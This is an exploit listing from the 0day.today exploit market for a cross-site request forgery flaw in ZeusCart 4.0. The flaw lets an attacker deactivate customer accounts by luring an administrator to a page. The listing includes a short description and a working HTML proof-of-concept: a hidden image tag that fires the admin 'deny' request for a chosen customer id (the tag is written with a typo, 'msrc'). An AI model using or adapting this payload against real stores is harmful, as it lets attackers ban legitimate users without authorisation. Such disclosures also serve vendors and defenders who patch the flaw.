[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) Vulnerability

Author
mqt
Risk
[
Security Risk Low
]
0day-ID
0day-ID-31834
Category
web applications
Date add
22-12-2018
Platform
php
# Exploit Title: ZeusCart4.0 Deactivate Customer Accounts CSRF
# Exploit Author: mqt
# Vendor Homepage: http://http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF

1. Vulnerability Description

Due to the form not being validated, ZeusCart4.0 suffers from a Cross
Site Request Forgery vulnerability, which means an attacker can
perform actions on behalf of a victim, by having the victim visit an
attacker controlled site.

In this case, the attacker is able to "deactivate" any customer
accounts, which means that the account is banned and cannot login.

Proof of Concept:
<html>
	<body>
		<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
	</body>
</html>

#  0day.today [2024-11-15]  #